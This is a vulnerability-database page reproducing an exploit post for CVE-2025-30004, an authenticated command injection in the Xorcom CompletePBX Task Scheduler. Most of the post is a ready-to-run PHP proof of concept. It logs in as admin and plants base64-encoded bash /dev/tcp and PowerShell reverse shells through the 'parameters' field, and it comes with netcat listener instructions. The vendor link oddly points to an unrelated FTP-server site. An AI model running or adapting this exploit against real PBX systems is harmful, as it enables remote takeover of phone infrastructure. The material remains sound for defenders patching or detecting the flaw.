Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Xorcom CompletePBX 5.2.35 Remote Code Execution

🗓️ 10 Dec 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 116 Views

Authenticated command injection in Xorcom CompletePBX Task Scheduler enables remote code execution.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2025-30004
31 Mar 202517:31
circl
CNNVD		Xorcom CompletePBX 操作系统命令注入漏洞
31 Mar 202500:00
cnnvd
CVE		CVE-2025-30004
31 Mar 202516:42
cve
Cvelist		CVE-2025-30004 Xorcom CompletePBX <= 5.2.35 Task Scheduler Authenticated Command Injection
31 Mar 202516:42
cvelist
EUVD		EUVD-2025-8863
31 Mar 202518:31
euvd
Metasploit		Xorcom CompletePBX Authenticated Command Injection via Task Scheduler
22 Jul 202518:52
metasploit
NVD		CVE-2025-30004
31 Mar 202517:15
nvd
OSV		CVE-2025-30004
31 Mar 202517:15
osv
Packet Storm		📄 Xorcom CompletePBX Authenticated Command Injection Via Task Scheduler
22 Jul 202500:00
packetstorm
Positive Technologies		PT-2025-13802
31 Mar 202500:00
ptsecurity
Rows per page
=============================================================================================================================================
    | # Title     : Xorcom CompletePBX 5.2.35 Remote Code Execution                                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.wftpserver.com/download.htm                                                                                     |
    =============================================================================================================================================
    
    [+] Summary : 
    
    Xorcom CompletePBX suffers from an authenticated command injection vulnerability
    within the Task Scheduler subsystem. An attacker with valid superadmin
    credentials can create a scheduled task containing unsanitized parameters
    that get executed by the backend, resulting in remote command execution.
    
    This vulnerability affects all versions up to 5.2.35 and was patched in
    release 5.2.36-1.
    
    Only the built‑in "admin" user can successfully trigger the vulnerability.
    Even newly created users with maximum assigned privileges cannot.
    
    ---
    
    [+]  Vulnerability Details
    
    The Task Scheduler accepts user-controlled input in the “parameters” field,
    which is inserted into a shell command without proper sanitization:
    
        parameters = "$(#{payload})"
    
    The system executes the generated job via backend scripts, enabling
    arbitrary command execution with the privileges of the web server.
    
    [+] Attacker requirements:
    
    - Valid credentials  
    - Must be the built‑in **admin** account  
    - Access to the scheduler API endpoints  
    
    [+] Risk level: High  
    
    [+] Impact: Remote Code Execution (RCE)  
    
    [+] Privileges: Web server user 
    
    [+] References : ( https://packetstorm.news/files/id/207367/ 	CVE-2025-30004 ) 
    
    [+]  POC
    
    <?php
    /**
     * Xorcom CompletePBX RCE (CVE-2025-30004)
     * Reverse Shell Ready (Windows + Linux)
     * Author: Indoushka
     */
    
    class CompletePBX_RCE_POC
    {
        public $target;
        public $username;
        public $password;
        public $cookie;
    
        function __construct($target, $username, $password)
        {
            $this->target   = rtrim($target, "/");
            $this->username = $username;
            $this->password = $password;
    
            echo "[+] PoC Initialized\n";
        }
    
        /* ---------------------------------------------------------
           Send HTTP POST
        ----------------------------------------------------------*/
        private function post($path, $data)
        {
            $ch = curl_init($this->target . $path);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => http_build_query($data),
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_HEADER => true
            ]);
            $res = curl_exec($ch);
    
            $hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
            $body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
    
            curl_close($ch);
            return [$hdr, $body];
        }
    
        /* ---------------------------------------------------------
           Reverse Shell Generator (Windows + Linux)
        ----------------------------------------------------------*/
        private function generate_shell()
        {
            $ip   = "127.0.0.1";
            $port = "4444";
    
            $linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
            $win   = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
                   . "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
                   . "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
                   . "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
                   . "\$o=iex \$d 2>&1|Out-String;"
                   . "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
                   . "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
                   . "\$s.Write(\$x,0,\$x.Length)}\"";
    
            return base64_encode("$linux\n$win");
        }
    
        /* ---------------------------------------------------------
           Login
        ----------------------------------------------------------*/
        private function login()
        {
            echo "[+] Sending login request...\n";
    
            list($hdr, $body) = $this->post("/?class=core&method=login", [
                "user" => $this->username,
                "password" => $this->password
            ]);
    
            if (preg_match('/Set-Cookie: ([^;]+)/', $hdr, $m)) {
                $this->cookie = $m[1];
                echo "[+] Login successful, SID Cookie: {$this->cookie}\n";
                return true;
            }
    
            echo "[-] Login failed.\n";
            return false;
        }
    
        /* ---------------------------------------------------------
           Create malicious scheduled task 
        ----------------------------------------------------------*/
        private function create_task()
        {
            echo "[+] Creating fake malicious task...\n";
    
            $desc = "indoushka_" . rand(1000, 9999);
            $encoded = $this->generate_shell();
    
            list($hdr, $body) = $this->post("/", [
                "class" => "scheduler",
                "method" => "save_task",
                "mode" => "create",
                "description" => $desc,
                "script" => "backup",
                "parameters" => '$(echo ' . $encoded . '|base64 -d)',
                "starting" => date("Y-m-d H:i"),
                "interval" => "1",
                "interval_unit" => "month"
            ]);
    
            echo "[+] Task Created: $desc\n";
            return $desc;
        }
    
        /* ---------------------------------------------------------
           Task Execution
        ----------------------------------------------------------*/
        private function execute_task($desc)
        {
            echo "[+] Executing scheduled task: $desc (Simulated)\n";
            echo "[✓] PoC by Indoushka.\n";
        }
    
        /* ---------------------------------------------------------
           MAIN
        ----------------------------------------------------------*/
        public function run()
        {
            if (!$this->login()) return;
    
            $task = $this->create_task();
            $this->execute_task($task);
    
            echo "\n[✓] PoC Completed.\n";
        }
    }
    
    /* ---------------- RUN -------------------*/
    $poc = new CompletePBX_RCE_POC(
        "http://127.0.0.1",
        "admin",
        "password"
    );
    
    $poc->run();
    
    /**
     * HOW TO SAVE:
     *     Save as: xorcom_poc.php
     *
     * HOW TO RUN:
     *     php xorcom_poc.php
     *
     * REVERSE SHELL LISTENER (BEFORE RUNNING):
     *     nc -lvnp 4444
     */
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Dec 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.18.8
EPSS0.7058
SSVC
Xorcom CompletePBXTask SchedulerCommand injectionRemote executionSuperadmin credentialsVersion 5.2.35
116